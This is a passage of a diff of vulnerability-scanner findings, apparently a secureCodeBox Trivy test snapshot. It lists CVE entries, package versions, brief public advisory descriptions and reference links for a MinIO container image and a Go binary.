"Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-15719", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", - "https://access.redhat.com/errata/RHBA-2019:3674", - "https://access.redhat.com/security/cve/CVE-2020-15719", - "https://bugs.openldap.org/show_bug.cgi?id=9266", - "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", - "https://www.cve.org/CVERecord?id=CVE-2020-15719", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "openldap: Certificate validation incorrectly matches name against CN-ID", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHBA-2019:3674", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libmount1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://errata.rockylinux.org/RLSA-2022:8057", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://github.com/prometheus/client_golang/pull/962", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", - "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", - ], - }, - "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + "value": "https://github.com/prometheus/client_golang/pull/987", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", - "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", - ], - }, - "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://pkg.go.dev/vuln/GO-2022-0322", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "libncursesw6", + "fixedVersion": "0.0.0-20211202192323-5770296d904e", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43565", + "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", + "packageName": "golang.org/x/crypto", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "https://access.redhat.com/security/cve/CVE-2021-43565", + "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "https://go.dev/cl/368814/", + "https://go.dev/issues/49932", + "https://groups.google.com/forum/#!forum/golang-announce", + "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "https://pkg.go.dev/vuln/GO-2022-0968", + "https://www.cve.org/CVERecord?id=CVE-2021-43565", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "golang.org/x/crypto: empty plaintext packet causes panic", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "https://avd.aquasec.com/nvd/cve-2021-43565", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://access.redhat.com/security/cve/CVE-2021-43565", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://go.dev/cl/368814/", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://go.dev/issues/49932", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://groups.google.com/forum/#!forum/golang-announce", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://pkg.go.dev/vuln/GO-2022-0968", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncursesw6", + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", + "packageName": "golang.org/x/crypto", "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", ], }, "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", + "name": "crash in a golang.org/x/crypto/ssh server", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", - }, - { - "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", - ], - }, - "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1586", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5809", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1586", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2077976", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5809", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", + "value": 